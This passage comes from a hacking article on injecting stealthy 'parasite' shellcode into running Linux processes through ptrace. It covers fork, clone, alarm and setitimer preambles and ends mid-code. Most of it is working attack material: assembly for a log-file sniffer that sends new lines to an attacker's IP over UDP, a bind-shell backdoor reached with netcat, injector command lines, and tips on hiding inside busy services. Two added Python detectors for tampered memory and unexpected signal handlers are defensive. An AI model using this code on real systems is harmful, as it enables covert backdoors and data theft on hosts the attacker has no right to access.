b7778000-b777a000 rw-p 00139000 fe:00 37071197   /lib/libc-2.7.so
b777a000-b777d000 rw-p b777a000 00:00 0
...
b7782000-b779c000 r-xp 00000000 fe:00 37071145   /lib/ld-2.7.so  <---
...

Libdl is mapped at the range b7782000-b779c000 and is executable. Code
injected starting at the initial address of the range is therefore
perfectly executable.
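Seen from the defender's side, a ptrace write into a read/execute,
file-backed mapping makes the kernel give the process a private copy of the
touched page, which /proc/<pid>/smaps reports as Private_Dirty/Anonymous
memory. The following added example (not part of the original article or of
the author's tools) parses smaps text and flags such mappings; the sample
input is constructed, reusing the address range shown above, and the
/bin/cat line is an assumption.

```python
"""Flag executable, file-backed mappings whose pages were modified in memory."""
import re
from dataclasses import dataclass, field

# Mapping header line, same layout as /proc/<pid>/maps.
HEADER = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+) ([r-][w-][x-][ps]) [0-9a-f]+ \S+ \d+\s*(.*)$")
# Per-mapping counter line such as "Private_Dirty:         4 kB".
COUNTER = re.compile(r"^(\w+):\s+(\d+) kB$")


@dataclass
class Mapping:
    start: int
    end: int
    perms: str
    path: str
    counters: dict = field(default_factory=dict)


def parse_smaps(text):
    """Turn the text of /proc/<pid>/smaps into a list of Mapping objects."""
    mappings = []
    for line in text.splitlines():
        head = HEADER.match(line)
        if head:
            mappings.append(Mapping(int(head[1], 16), int(head[2], 16),
                                    head[3], head[4].strip()))
            continue
        counter = COUNTER.match(line.strip())
        if counter and mappings:
            mappings[-1].counters[counter[1]] = int(counter[2])
    return mappings


def modified_text_mappings(mappings):
    """Return (mapping, kB) for r-x file-backed mappings with private changes.

    Clean library text is shared with the page cache, so any privately
    modified page in it means the in-memory code differs from the file.
    """
    hits = []
    for mp in mappings:
        if not mp.path.startswith("/"):
            continue                      # anonymous, [heap], [stack], ...
        if "x" not in mp.perms or "w" in mp.perms:
            continue                      # only read/execute text is checked
        changed_kb = max(mp.counters.get("Private_Dirty", 0),
                         mp.counters.get("Anonymous", 0))
        if changed_kb:
            hits.append((mp, changed_kb))
    return hits


def scan_pid(pid):
    """Run the check against a live process (needs read access to smaps)."""
    with open(f"/proc/{pid}/smaps") as handle:
        return modified_text_mappings(parse_smaps(handle.read()))


# Constructed sample: one 4 kB page of the ld-2.7.so text has been rewritten.
SAMPLE_SMAPS = """
08048000-08053000 r-xp 00000000 fe:00 1310722    /bin/cat
Size:                 44 kB
Rss:                  40 kB
Shared_Clean:         40 kB
Private_Dirty:         0 kB
Anonymous:             0 kB
b7778000-b777a000 rw-p 00139000 fe:00 37071197   /lib/libc-2.7.so
Size:                  8 kB
Rss:                   8 kB
Private_Dirty:         8 kB
Anonymous:             8 kB
b7782000-b779c000 r-xp 00000000 fe:00 37071145   /lib/ld-2.7.so
Size:                104 kB
Rss:                  96 kB
Shared_Clean:         92 kB
Private_Dirty:         4 kB
Anonymous:             4 kB
"""

if __name__ == "__main__":
    for mp, kb in modified_text_mappings(parse_smaps(SAMPLE_SMAPS)):
        print(f"{mp.start:08x}-{mp.end:08x} {mp.perms} {mp.path}: "
              f"{kb} kB of text modified in memory")
```

Debugger breakpoints and libraries with text relocations produce the same
counters, so a hit is a lead to compare against the on-disk file, not proof.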

Some considerations about this method: if the infected program uses
dlopen(), dlclose() or dlsym() during its execution, some problems
could arise. The solution is to inject into the same library, but in
unused memory locations.
(From the tests of the author the initial memory locations of the library
are not critical and do not affect the execution of programs.)

There are other problems on Linux systems that use the grsec kernel patch.
With this patch the text segment of the host process is marked
read/execute only and therefore is not writable with ptrace.
If that's your case, Ryan O'Neill has published a very powerful
algorithm [3] that exploits sysenter instructions (used by the host's code)
to execute a series of system calls (the algorithm is able to
allocate and set the correct permissions on a new memory area without
modifying the text segment of the traced process).
I recommend everyone read the document, as it is very interesting.

The other premise I want to state in this section concerns the basic
information the injector (the program that injects the parasite) must
provide to the shellcode to restore the execution of the host program.

Our implementation of the injector gets the current EIP (Instruction
Pointer) of the host process, pushes it onto the stack and writes the
address of the parasite (injected into libdl) into EIP.

The parasite, in its initialization part, saves every register it uses.
Then, at the end of its execution, every modified register is restored.
A simple way to do this is to push and pop the registers with the
instructions PUSHA and POPA.

After that, a simple RET instruction restores the execution of the host
process, since its saved EIP is on the top of the stack.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

parasite_skeleton:

    # preamble
    push %eax       # save registers
    push %ebx       # used by the shellcode

    # ...
    # shellcode
    # ...

    # epilogue
    pop %ebx        # restore modified registers
    pop %eax        # ...

    ret             # restore execution of the host

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

Another very useful piece of information the injector provides to the
shellcode is the address of a persistent memory location. In the case of
this document, the address is also taken from /proc/pid/maps:

...
b7701000-b771c000 r-xp 00000000 08:03 1261592    /lib/ld-2.11.1.so
b771c000-b771d000 r--p 0001a000 08:03 1261592    /lib/ld-2.11.1.so
b771d000-b771e000 rw-p 0001b000 08:03 1261592    /lib/ld-2.11.1.so <--
...

The range b771d000-b771e000 has read and write permissions and is
suitable for this purpose.

Other techniques exist to dynamically create writable and executable
memory locations, such as the use of mmap() in the host process. But these
techniques are beyond the scope of this article and will not be analyzed
here.

Since the necessary premises have been made, we can discuss the first
generation of our stealth parasite.

------[ 2. First generation: fork() and clone()

The simplest idea to allow the host process to continue its execution
properly and, at the same time, hide the parasite, is the use of the
fork() syscall (or the creation of a new thread, not analyzed here).

Using fork() the process is split in two:
 - the parent process (the original one) can continue its normal execution
 - the child process, instead, will execute the parasite

An important thing to note, is that the child process inherits the parent's
name and a copy of its memory.

This means that if we inject the parasite in the process "server1",
another process "server1" will be created as its child.

Before the injection:
# ps -A
...
...
 5478 ?        00:00:00 server1
...

After the injection:
# ps -A
...
...
 5478 ?        00:00:00 server1
 5479 ?        00:00:00 server1
...

If the host process is carefully chosen, the parasite will be very hard
to detect. Just think of some network services (such as apache2) that
generate a lot of children: a single child process is unlikely to be
detected.

The fork parasite can be implemented as a preamble preceding the real
shellcode:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

fork_parasite:
    push %eax       # save %eax value (needed by parent process)

    push $2
    pop %eax
    int $0x80       # fork

    test %eax, %eax
    jz shellcode    # child:  jumps to shellcode

    pop %eax        # parent: restores host process execution
    ret

shellcode:          # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The preamble simply makes a call to fork(), analyzes the results, and
decides the execution path to choose.

With this implementation, any existing shellcode can be turned into a
parasite: it's the responsibility of the injector to concatenate the parts
before inserting them in the host.

A very similar technique uses clone() instead of fork(). We can consider
clone() a generalization of the fork() syscall through which it's possible
to create both processes and threads.

The difference is in the options passed to the syscall. A thread is
generated using particular flags:

  - CLONE_VM  the calling process and the child process run in the same
              memory space. Memory writes performed by the calling process
              or by the child process are also visible in the other
              process.
              Any memory mapping or unmapping performed by the child or
              the calling process also affects the other process.

  - CLONE_SIGHAND  the calling process and the child process share the same
                   table of signal handlers.

  - CLONE_THREAD  the child is placed in the same thread group as the
                  calling process.

The CLONE_THREAD flag is the most important: it is what distinguishes what
we call a "process" from what we call a "thread", at least on Linux systems.

Let's see how the clone() preamble is implemented:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

clone_parasite:
    pusha           # save registers (needed by parent process)

    # call to sys_clone

    xorl    %eax, %eax
    mov     $120, %al

    movl     $0x18900, %ebx # flags: CLONE_VM|CLONE_SIGHAND|
                            #        CLONE_THREAD|CLONE_PARENT

    int     $0x80           # clone

    test %eax, %eax
    jz shellcode    # child:  jumps to shellcode

    popa            # parent: restores host process execution
    ret

shellcode:          # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The code is based on the fork() preamble, and its behaviour is very
similar. The difference is in the result.

Before the injection (single threaded process):
# ps -Am
...
...
 8360 pts/3    00:00:00 server1
    - -        00:00:00 -
...

After the injection (an additional thread is created):
# ps -Am
...
...
 8360 pts/3    00:00:00 server1
    - -        00:00:00 -
    - -        00:00:00 -
...

Surely the generation of a thread is more stealthy than the generation of a
process. However, there is a small disadvantage: if the parasite thread
alters parts of the main thread, it can bring the host to a crash. The
resources are shared, so their use must be much more careful.

We have just seen how to create parasites executed as independent processes
or threads.

However, these types of parasites are not completely invisible. In some
circumstances, and in the case of particular (monitored) processes, the
generation of a child (process or thread) can be problematic or easily
detectable.

Therefore, in the next section, we will discuss a different type of
parasite/preamble, deeply integrated with its host.

------[ 3. Second generation: signal()/alarm()

If we don't like the creation of another process to execute our parasite
we need some kind of time sharing mechanism inside a single process (did
you see the title of this document?)

It's a scheduling problem: when a new process is created, the operating
system takes care of assigning it time and resources necessary to its
execution.
If we don't want to rely on this mechanism, we have to simulate a scheduler
within a single process, to allow a concurrent execution of parasite and
host, using (usually) asynchronous events.

When you think of asynchronous events in a Unix-like system, the first
thing that comes to mind is signals.
If a process registers a handler for a specific signal, when the signal
is sent the operating system stops its normal execution and makes a
(void function) call to the handler.
When the handler returns, the execution of the process is restored.

There are several functions provided by the operating system to generate
signals. In this chapter we'll use alarm().

Alarm() arranges for a SIGALRM signal to be delivered to the calling
process when an arbitrary number of seconds has passed.
Its main limitation is that you can not specify time intervals shorter than
one second, but this is not a problem in most cases.

Our parasite/preamble needs to register itself as a handler for the signal
SIGALRM, and renew the timer every time it is executed, to be called at
regular intervals.
This creates a kind of scheduler within a single process, and there is no
need to call fork() (or functions to create threads).

Here is our second generation parasite/preamble:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

# signal/alarm parasite

handler:
    pusha
    # alarm(timeout)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    mov     $27, %al
    mov     $0x1, %bl    # 1 second
    int     $0x80

schedule:
    # signal(SIGALRM, handler)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    mov    $48, %al
    mov    $14, %bl
    jmp    schedule_end   # load schedule_end address
load_handler:
    pop    %ecx
    subl    $0x23, %ecx   # adjust %ecx to point handler()
    int    $0x80
    popa
    jmp    shellcode

schedule_end:
    call load_handler

shellcode:        # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

Of course the type of shellcode you can append to the preamble must
be aware of the "alternative" scheduling mechanism.

It must be able to split its operations between multiple calls, and must
also not take too much time to run a single step (i.e. a single call),
so as not to slow down the host program or overlap with the next handler
call.

In short, to work properly, a call to the handler (our parasite) must last
less than the timer interval.

However, alarm() is not the only function able to simulate a scheduler.
In the next chapter we will see a more advanced function, which allows a
more granular control of the execution of the parasite.

------[ 4. Third generation: setitimer()

We've just arrived at the latest generation of the parasite.
In the first part of the chapter we'll spend some time to analyze the
function setitimer(), on which the code is based.

The definition of the function is:
int setitimer(int which, const struct itimerval *new_value,
                     struct itimerval *old_value);

As in the case of alarm(), the function setitimer() provides a mechanism
for a process to interrupt itself in the future using signals.
Unlike alarm, however, you can specify intervals of a few microseconds and
choose various types of timers and time domains.

The argument "int which" selects the type of timer and therefore
the signal that will be sent to the process:

ITIMER_REAL    0x00  the most used timer, it decrements in real time, and
                     delivers SIGALRM upon expiration.

ITIMER_VIRTUAL 0x01  decrements only when the process is executing, and
                     delivers SIGVTALRM upon expiration.

ITIMER_PROF    0x02  decrements both when the process executes and when the
                     system is executing on behalf of the process. Coupled
                     with  ITIMER_VIRTUAL, this timer is usually used to
                     profile the time spent by the application in user and
                     kernel space.  SIGPROF is delivered upon expiration.

We will use ITIMER_REAL because it allows the generation of signals at
regular intervals, and is not influenced by environmental factors such as
the workload of a system.

The argument "const struct itimerval *new_value" points to an itimerval
structure, defined as:

struct itimerval {
    struct timeval it_interval; /* next value */
    struct timeval it_value;    /* current value */
};

struct timeval {
    long tv_sec;                /* seconds */
    long tv_usec;               /* microseconds */
};

The last timeval structure, it_value, is the period between the call to
the function and the first timer interrupt. If zero, the alarm is disabled.

The other one, it_interval, is the period between successive timer
interrupts. If zero, the alarm will only be sent once.

We'll set both structures to the same time interval.

The last argument, "struct itimerval *old_value", if not NULL, will be set
by the function at the value of the previous timer. We'll not use this
feature.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

# setitimer parasite

setitimer_hdr:
    pusha
    # sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    xorl    %edx, %edx
    mov     $104, %al
    jmp     struct_itimerval # load itimerval structure
load_struct:
    pop     %ecx
    int     $0x80
    popa
    jmp     handler

struct_itimerval:
    call    load_struct
    # itimerval structure: you can modify the values
    # to set your time intervals
    .long    0x0       # seconds
    .long    0x5000    # microseconds
    .long    0x0       # seconds
    .long    0x5000    # microseconds

# signal handler, called by the timer
handler:
    pusha
    # signal(SIGALRM, handler)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    mov    $48, %al
    mov    $14, %bl
    jmp    handler_end   # load handler_end address
load_handler:
    pop    %ecx
    subl    $0x19, %ecx  # adjust %ecx to point handler()
    int    $0x80
    popa
    jmp    shellcode

handler_end:
    call load_handler

shellcode:        # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

This preamble is used in the same way as the previous (alarm) one. The only
additional requirement is a fine-tuned timer: a compromise between the
frequency of executions and the stability of the parasite, which must be
able to carry out its operations in less time than a timer's cycle.

You can work around this problem by transforming these preambles
(including the preamble that makes use of alarm()) into epilogues, so that
the timer starts counting only after the parasite has finished its
operations.

In fact we are going to see how this was implemented in the real parasites
presented below.
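Both the clone() preamble of section 2 and the signal()/alarm() and
setitimer() preambles of sections 3 and 4 change what /proc/<pid>/status
reports for the host: the thread count, and the SigCgt mask of signals that
have a handler installed. The following added example (not part of the
original article) decodes those fields and compares them with a per-program
baseline; the status text and the baseline for cat are constructed
assumptions.

```python
"""Triage /proc/<pid>/status for an extra thread or an unexpected handler."""

# Signals delivered by alarm()/setitimer() on Linux x86 (number -> name).
TIMER_SIGNALS = {14: "SIGALRM", 26: "SIGVTALRM", 27: "SIGPROF"}


def parse_status(text):
    """Parse the "Key:<tab>value" lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def caught_signals(fields):
    """Decode SigCgt: bit (n - 1) is set when signal n has a handler."""
    mask = int(fields.get("SigCgt", "0"), 16)
    return {n for n in range(1, 65) if mask & (1 << (n - 1))}


def triage(fields, baseline):
    """Compare one process against what its program is expected to do."""
    name = fields.get("Name", "?")
    pid = fields.get("Pid", "?")
    expected = baseline.get(name)
    if expected is None:
        return [f"{name} (pid {pid}): no baseline recorded"]
    findings = []
    threads = int(fields.get("Threads", "1"))
    if threads > expected["threads"]:
        findings.append(f"{name} (pid {pid}): {threads} threads, "
                        f"baseline {expected['threads']}")
    for signo in sorted(caught_signals(fields) - expected["caught"]):
        label = TIMER_SIGNALS.get(signo, f"signal {signo}")
        findings.append(f"{name} (pid {pid}): unexpected handler for {label}")
    return findings


def triage_pid(pid, baseline):
    """Run the check against a live process."""
    with open(f"/proc/{pid}/status") as handle:
        return triage(parse_status(handle.read()), baseline)


# Assumed baseline, recorded from a known-good instance of each program.
BASELINE = {"cat": {"threads": 1, "caught": set()}}

# Constructed sample: a cat process with a second thread and a SIGALRM
# handler (0x2000 is bit 13, i.e. signal 14).
SAMPLE_STATUS = """\
Name:\tcat
State:\tS (sleeping)
Pid:\t9425
PPid:\t9301
Threads:\t2
SigBlk:\t0000000000000000
SigIgn:\t0000000000000000
SigCgt:\t0000000000002000
"""

if __name__ == "__main__":
    for finding in triage(parse_status(SAMPLE_STATUS), BASELINE):
        print(finding)
```

Because the handler shown above re-registers itself on every call, a single
reading can miss it; sample the status file several times.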

------[ 5. Working parasites

Here we come to the practical part. Three working parasites will be
presented: one for each technique exposed in the theoretical part of the
document.

To inject the parasites the injector cymothoa [4] was used, written by the
same author, and which already includes the code presented in the article.
Although it is possible, through various techniques, to inject shellcode
into processes, downloading the program is recommended in order to try the
examples while reading.

------------[ 5.1 Process and thread backdoor

Our first real parasite is a backdoor created by applying the fork()
preamble to pre-existing shellcode.
The shellcode used was developed by izik (izik@tty64.org) and is
available on several sites [5]. For this reason it will not be reproduced
here.

The shellcode is a classic exploit shellcode: it binds /bin/sh to a TCP
port and forks a shell for every connection.

Using it with the aid of an injector has several advantages:
  - The ability to configure its behavior. In this case the possibility to
    choose the port to listen on.
  - The possibility of keeping the host alive using one of the
    preambles shown earlier.
  - Not having to worry about memory locations necessary to the execution
    and data storage, since they are automatically provided.

Let's see in practice how this parasite works...

First, on the victim machine, we must identify a suitable host process.
In this example we will use an instance of cat, since it's really easy to
check if it continues its execution after the injection.

root@victim# ps -A | grep cat
 1727 pts/6    00:00:00 cat

We need this pid for the injection:

root@victim# cymothoa -p 1727 -s 1 -y 5555
[+] attaching to process 1727

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffe00   ebx value: 0x0
 esp value: 0xbf81e1c8   eip value: 0xb78be430
 ------------------------------------------------------------

[+] new esp: 0xbf81e1c4
[+] payload preamble: fork
[+] injecting code into 0xb78bf000
[+] copy general purpose registers
[+] detaching from 1727

[+] infected!!!
root@victim#

The process is now infected: we should be able to see two cat instances,
the original one and the new one that corresponds to the parasite:

root@victim# ps -A | grep cat
 1727 pts/6    00:00:00 cat
 1842 pts/6    00:00:00 cat

If, from a different machine, we try to connect to the port 5555, we should
get a shell:

root@attacker# nc -vv victim 5555
Connection to victim 5555 port [tcp/*] succeeded!
uname -a
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
whoami
root

At the same time, if we write a few lines in the console where the original
cat is running, we should see the usual output:

root@victim# cat
test123
test123
foo
foo

The backdoor functions properly: the two processes are running at the same
time without crashing...

The same backdoor can also be injected in a similar way using the clone()
preamble, and thus running the parasite as a new thread instead of a new
process.

The command is similar, we only disable the fork() preamble and force
clone() instead:

root@victim# cymothoa -p 9425 -s 1 -y 5555 -F -b
[+] attaching to process 9425

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffe00   ebx value: 0x0
 esp value: 0xbfb4beb8   eip value: 0xb78da430
 ------------------------------------------------------------

[+] new esp: 0xbfb4beb4
[+] payload preamble: thread
[+] injecting code into 0xb78db000
[+] copy general purpose registers
[+] detaching from 9425

[+] infected!!!

If we execute ps without special flags we now see only one process:

root@victim# ps -A | grep cat
 9425 pts/3    00:00:00 cat

But with the option -m we see an additional thread:

root@victim# ps -Am
...
 9425 pts/3    00:00:00 cat
    - -        00:00:00 -
    - -        00:00:00 -
...
...

Using netcat on the port 5555 of the victim machine works as expected.

Some notes on the proper use of the fork() and clone() preambles:
  - These preambles are compatible with virtually any existing shellcode,
    without any modification. They can be used to easily turn what you
    have already written into parasitic code.
    In the case of clone() preamble the situation is slightly more critical
    because there is the possibility that the parasite thread interferes
    with the host thread. However, widespread shellcodes are usually
    already attentive to these issues, and should not cause problems.
  - It is better to inject the parasite into servers that generate many
    child processes. Some of those tested by me are apache2, dhclient3 and,
    in the case of a desktop system, the processes of the window manager.
    It's hard to find a needle in a haystack, and it is difficult to tell
    a single parasite from dozens of apache2 processes ;)

------------[ 5.2 Remote "tail follow" parasite

Have you ever used tail with the "-f" (follow) option? This mode is used
to monitor text files, usually logs, to see in real time the new lines
added by other processes.

Tail accepts a sleep interval as an option: the waiting time between one
check of the file and the next.

It's therefore natural, when writing a parasite with the same function, to
use a preamble that allows a precise control of time: the setitimer()
preamble.

This is the code of this new parasite... It is more complex than the
previous codes.
After the source there will be a brief explanation of its operations, and
finally an example of its practical use.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<

#
# Scheduled tail setitimer parasite
#

#
# Preamble
#

setitimer_hdr:
	pusha
	# sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
	xorl    %eax, %eax
	xorl    %ebx, %ebx
	xorl    %edx, %edx
	mov     $104, %al
	jmp     struct_itimerval
load_struct:
	pop	%ecx
	int	$0x80
	popa
	jmp	handler

struct_itimerval:
	call	load_struct
	# these values are replaced by the injector:
	.long   0x0#53434553  # seconds
	.long   0x5343494d  # microseconds
	.long   0x0#53434553  # seconds
	.long   0x5343494d  # microseconds

handler:
	pusha
	# signal(SIGALRM, handler)
	xorl	%eax, %eax
	xorl	%ebx, %ebx
	mov	$48, %al
	mov	$14, %bl
	jmp	handler_end
load_handler:
	pop	%ecx
	subl	$0x19, %ecx # adjust %ecx to point handler()
	int	$0x80
	popa
	jmp	shellcode

handler_end:
	call load_handler
#
# The shellcode starts here
#

shellcode:
	pusha

	# check if already initialized
	mov     $0x4d454d50, %esi  # replaced by the injector
                                   # (persistent memory address)
	mov     (%esi), %eax
	cmp     $0xdeadbeef, %eax
	je      open_call          # jump if already initialized

	# initialize
	mov     $0xdeadbeef, %eax
	mov     %eax, (%esi)
	add     $4, %esi
	xorl    %eax, %eax
	mov     %eax, (%esi)
	sub     $4, %esi

open_call:
	# call to sys_open(file_path, O_RDONLY)
	xorl    %eax, %eax
	mov     $5, %al
	jmp     file_path
load_file_path:
	pop     %ebx
	xorl    %ecx, %ecx
	int     $0x80       # %eax = file descriptor
	mov     %eax, %edi  # save file descriptor

check_file_length:
	# call to sys_lseek(fd, 0, SEEK_END)
	mov     %edi, %ebx
	xorl    %eax, %eax
	mov     $19, %al
	xorl    %ecx, %ecx
	xorl    %edx, %edx
	mov     $2, %dl
	int     $0x80  # %eax = end of file offset (eof)

	# get old eof, and store new eof
	add     $4, %esi
	mov     (%esi), %ebx
	mov     %eax, (%esi)

	# skip the first read
	test    %ebx, %ebx
	jz      return_to_main_proc

	# check if file is larger
	# (current end of file > previous end of file)
	cmp     %eax, %ebx
	je      return_to_main_proc # eof not changed:
                                    # return to main process

calc_data_len:
	# calculate new data length
	# (current eof - last eof)
	mov     %eax, %esi
	sub     %ebx, %esi # saved in %esi

set_new_position:
	# call to sys_lseek(fd, last_eof, SEEK_SET)
	xorl    %eax, %eax
	mov     $19, %al
	mov     %ebx, %ecx
	mov     %edi, %ebx
	xorl    %edx, %edx
	int     $0x80  # %eax = last end of file offset

read_file_tail:
	# allocate buffer
	sub     %esi, %esp

	# call to sys_read(fd, buf, count)
	xorl    %eax, %eax
	mov     $3, %al
	mov     %edi, %ebx
	mov     %esp, %ecx
	mov     %esi, %edx
	int     $0x80       # %eax = bytes read
	mov     %esp, %ebp  # save pointer to buffer

open_socket:
	# call to sys_socketcall($0x01 (socket), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x01, %bl
	jmp     socket_args
load_socket_args:
	pop     %ecx
	int     $0x80  # %eax = socket descriptor
	jmp     send_data

socket_args:
	call load_socket_args
	.long	0x02	# AF_INET
	.long	0x02	# SOCK_DGRAM
	.long	0x00	# NULL

send_data:

	# prepare sys_socketcall (sendto) arguments
	jmp     struct_sockaddr
load_sockaddr:
	pop     %ecx
	push    $0x10   # sizeof(struct_sockaddr)
	push    %ecx    # struct_sockaddr address
	xorl    %ecx, %ecx
	push    %ecx    # flags
	push    %edx    # buffer len
	push    %ebp    # buffer pointer
	push    %eax    # socket descriptor

	# call to sys_sendto($11 (sendto), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $11, %bl
	mov     %esp, %ecx
	int     $0x80
	jmp     restore_stack

struct_sockaddr:
	call load_sockaddr
	.short	0x02        # AF_INET
	.short	0x5250      # PORT (replaced by the injector)
	.long	0x34565049  # DEST IP (replaced by the injector)

restore_stack:
	# restore stack
	pop     %ebx    # socket descriptor
	pop     %eax    # buffer pointer
	pop     %edx    # buffer len
	pop     %eax    # flags
	pop     %eax    # struct_sockaddr address
	pop     %eax    # sizeof(struct_sockaddr)

	# deallocate buffer
	add     %edx, %esp


close_socket:
	# call to sys_close(socket)
	xorl    %eax, %eax
	mov     $6, %al
	int     $0x80

return_to_main_proc:

	# call to sys_close(fd)
	xorl    %eax, %eax
	mov     $6, %al
	mov     %edi, %ebx
	int     $0x80

	# return
	popa
	ret

file_path:
	call load_file_path
	.ascii  "/var/log/apache2/access.log"

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The code is not written in a super-compact way, since space is not a
problem and ease of programming and modification has been preferred.

The code can be summarized in a few steps:
1) Preamble (we already know).
2) Check to see if it's the first execution. This step makes use of a
   persistent memory location, provided by the injector.
3) File open and check of length.
4) Comparison with previous file's length.
4.1) If unchanged the parasite returns the execution to the host process.
4.2) If changed the execution continues.
5) Read the new lines of the file.
6) Send the new lines to the attacker via UDP.
7) Restore the stack.
8) Return the execution to the host process.

The shellcode receives several parameters from the injector: the address
of a persistent memory location, the attacker IP address and port, and the
microsecond interval for the timer.

The injector simply replaces known hexadecimal markers with these
parameters during the injection. You can see where the replacements occur
by looking at the comments in the code.

Now on to the fun part: the practical use of the parasite.

The first thing to do is to prepare the server on the attacker's machine
to receive data. The main directory of the injector contains a simple
UDP server implementation.

You need only to specify an available port:

root@attacker# ./udp_server 5555
./udp_server: listening on port UDP 5555

Now we can move to the victim's machine, and choose a suitable process.
For simplicity we will use cat again.

To inject the parasite we must specify some parameters:

root@victim# ./cymothoa -p `pidof cat` -s 14 -k 5000 -x attacker_ip -y 5555
[+] attaching to process 4694

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffe00   ebx value: 0x0
 esp value: 0xbfa9f3f8   eip value: 0xb77e8430
 ------------------------------------------------------------

[+] new esp: 0xbfa9f3f4
[+] injecting code into 0xb77e9000
[+] copy general purpose registers
[+] persistent memory at 0xb7805000 (if used)
[+] detaching from 4694

[+] infected!!!

The process is now infected. No new process has been created.

Now, assuming an apache2 server is running, we can try to make some
requests to the server to update /var/log/apache2/access.log (the file
we are monitoring).

root@attacker# curl victim_ip
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added.</p>
</body></html>

If everything worked properly we should see, in the console of the UDP
server, the new lines generated by our requests:

root@attacker# ./udp_server 5555
./udp_server: listening on port UDP 5555
::1 - - [26/May/2011:11:18:57 +0200] "GET / HTTP/1.1" 200 460 "-"
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
zlib/1.2.3.3 libidn/1.15"
::1 - - [26/May/2011:11:19:26 +0200] "GET / HTTP/1.1" 200 460 "-"
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
zlib/1.2.3.3 libidn/1.15"
...

Et voila, we have a remote file sniffer!

Of course the connections do not appear in the output of tools like
netstat, as they are only brief exchanges of data, and sockets are open
only when the monitored file has new lines (and immediately closed).

Some notes on the proper use of this preamble and parasite:
  - This preamble is usually not compatible with existing
    shellcode. The code must be modified to return the execution to the
    host process, restoring stack and registers.
  - It is better to inject the parasite into servers that run all the time
    the machine is on, but do not use the processor very much. The server
    dhclient3 is a perfect host.

------------[ 5.3 Single process backdoor

We have just arrived at the last and perhaps most interesting example of
parasite of this document.
That's what the author wanted to obtain: a backdoor that can live within
another process, without calls to fork() and without creating new threads.

The backdoor listens on a port (customizable by the injector), and
periodically checks if a client is connected. This part has been
implemented using nonblocking sockets and a modified alarm() preamble.

When a client is connected, it obtains a shell: the only time a call
to fork() is made.

As long as the backdoor is in listening mode, the only way to notice its
presence is to check the listening ports on the machine, but even in this
case we can use some tricks to make our parasite very difficult to detect.

Here's the code.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

#
# Single process backdoor (alarm preamble)
#

handler:
	pusha

set_signal_handler:
	# signal(SIGALRM, handler)
	xorl	%eax, %eax
	xorl	%ebx, %ebx
	mov	$48, %al
	mov	$14, %bl
	jmp	set_signal_handler_end
load_handler:
	pop	%ecx
	subl	$0x18, %ecx # adjust %ecx to point handler()
	int	$0x80
	jmp	shellcode

set_signal_handler_end:
	call load_handler

shellcode:
	# check if already initialized
	mov     $0x4d454d50, %esi  # replaced by the injector
                                   # (persistent memory address)
	mov     (%esi), %eax
	cmp     $0xdeadbeef, %eax
	je      accept_call        # jump if already initialized

socket_call:
	# call to sys_socketcall($0x01 (socket), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x01, %bl
	jmp     socket_args
load_socket_args:
	pop     %ecx
	int     $0x80 # %eax = socket descriptor

	# save socket descriptor
	mov     $0xdeadbeef, %ebx
	mov     %ebx, (%esi)
	add     $4, %esi
	mov     %eax, (%esi)
	sub     $4, %esi
	jmp     fcntl_call

socket_args:
	call load_socket_args
	.long	0x02	# AF_INET
	.long	0x01	# SOCK_STREAM
	.long	0x00	# NULL

fcntl_call:
